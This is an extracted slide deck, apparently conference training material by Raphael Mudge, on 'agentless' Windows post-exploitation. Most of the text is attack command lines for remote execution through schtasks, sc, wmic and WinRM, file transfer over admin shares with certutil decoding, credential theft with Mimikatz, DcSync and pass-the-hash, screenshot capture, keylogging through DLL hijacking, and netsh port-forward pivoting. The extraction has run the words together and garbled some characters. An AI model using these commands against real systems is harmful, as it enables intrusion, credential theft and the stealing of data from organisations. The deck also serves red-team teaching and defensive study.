View
9
Download
0
Category
Preview:
Citation preview
AgentlessPostExploita0on
RaphaelMudgersmudge@gmail.com
AgentlessPostExploita0on
• Remotecontroloftargetwithbuilt-inservices• Benefits– Similarresults,withoutmalwareonalltargets– Differentar0facts
• Drawbacks– Requiresaccessibleservices
Overview
• AdministratorRights• Execute• UploadandDownload• ProcessManipula0on• RecoveringCreden0als• UsingCreden0als• UserExploita0on• Pivo0ng• DEMO!
AdministratorRights
• Administratortrustsallowustodothings!• Interactw/adminsharesandscheduleprocesses• BothLocalandDomainAdministratormaNer!!
• AmIanadmin?dir\\host\C$at\\host
Execute
• Oldschool:at,schtasks,sc,wmicnet0me\\targetat\\targetHH:mmc:\path\to\programDeprecatedasofWindows8|2012server
Execute
• Oldschool:at,schtasks,sc,wmicschtasks/create/tnNAME/trc:\path\program/sconce/st00:00/Starget/RUSystemschtasks/run/tnNAME/Starget
Execute
• Oldschool:at,schtasks,sc,wmicsc\\targetcreatenamebinpath=“c:\path\program”sc\\targetstartnameMakesurethere’saspacea`erbinpath=
Execute
• Oldschool:at,schtasks,sc,wmicwmic/node:”target”processcallcreate“program”
Execute(Non-blind)
• PowerShellRemo0ng(WinRM)
Invoke-Command–ComputerNametarget–ScriptBlock{command}
Execute(Non-blind)
• PowerSploit’sInvoke-WmiCommand.ps1
Invoke-WmiCommand–ComputerNametarget–Payload{command}|select–exp“PayloadOutput”
Upload&Download• Push&pullfilesviaUNCpath\\target\share?– copymyfile\\target\share– copy\\target\share\theirfilemyfilenow
• Defaultshares
• NoDefaultShares?Turnthemon:– netshareC$– netshareadmin$
Share Mapsto
C$ C:\
ADMIN$ %SystemRoot%(e.g.,c:\windows)
UploadL
• Canyouruncommandsremotely?– Base64encodelocalfile– Runecho“partofbase64string”>>dest.b64
• Againandagain…
– Runcertu0l.exetodecoderemotefile• certu0l.exe–decodedest.b64dest.dll
hNps://gist.github.com/makfesta0on/47f9e8a431f96a266522
ProcessManipula0on
• ListProcessestasklist/v/Starget
• KillProcesstaskkill/Starget/PIDPID/F
ProcessManipula0on
• ListProcesseswmic/node:”target”processlistfullwmic/node:”target”processlistbrief
• KillProcesswmic/node:”target”where(ProcessID=“##”)
callterminate
RecoveringCreden0alMaterial
• PowerSploit’sInvoke-Mimikatz(WinRM)Invoke-Mimikatz–ComputerNametargetOr…Invoke-Mimikatz–ComputerNametarget-Commandcommand
RecoveringCreden0alMaterial
• DcSyncviamimikatzlsadump::dcsync/domain:DOMAIN.fqdn/user:DOMAIN\user
UsingCreden0als(AccessTokens)
• Createda`erlogon• Associatedwitheachprocessandthread• Contains:– UserandGroupInforma0on– Alistofprivilegesonlocalcomputer– Restric0ons(user/grouprightstakenaway)– Referencetocreden0als(supportssinglesign-on)
• Persistsinmemoryun0lreboot
UsingCreden0als
• Creden0alsrunas/netonly/user:DOMAIN\userprogram
• Pass-the-hash(Mimikatz)sekurlsa::pth/user:USER/domain:DOMAIN/ntlm:HASH/run:program
YourPayloadmayhavebuilt-inversionsofthese
hNp://blog.cobaltstrike.com/2015/12/16/windows-access-tokens-and-alternate-creden0als/
UserExploita0on
• ScreenshotswithProblemStepRecorder– Starttherecorderpsr.exe/start/gui0/outputc:\users\user\out.zip– Stoptherecorderpsr.exe/stop
hNps://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-remotely-with-metasploit/
UserExploita0on
• ScreenshotswithProblemStepRecorder– Starttherecorderpsr.exe/start/gui0/outputc:\users\user\out.zip– Stoptherecorderpsr.exe/stop
• Howtoruninuser’sdesktopsession?schtasks/IT/RUDOMAIN\user/RPpassword…
hNps://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-remotely-with-metasploit/
UserExploita0on
• LogkeystrokesviaDLLHijacking– CompileakeystrokeloggerasaDLL– Copyto\\target\C$\windows\linkinfo.dll– Remotelykillexplorer.exe– PullkeystrokelogfileviaC$share
Pivo0ng• Createaportforwardwithnetshnetshinterfaceportproxyaddv4tov4
listenport=LPORTlistenaddress=0.0.0.0connectport=FPORTconnectaddress=FHOST
• RequiresIPv6stackisinstalled.• Portforwardpersistsonreboot.CLEANUP!netshinterfaceportproxyreset
DEMONSTRATIONStealingSourceCodefromACME
Summary
• AdministratorRights• Execute• UploadandDownload• ProcessManipula0on• RecoveringCreden0als• UsingCreden0als• UserExploita0on• Pivo0ng• DEMO!
Recommended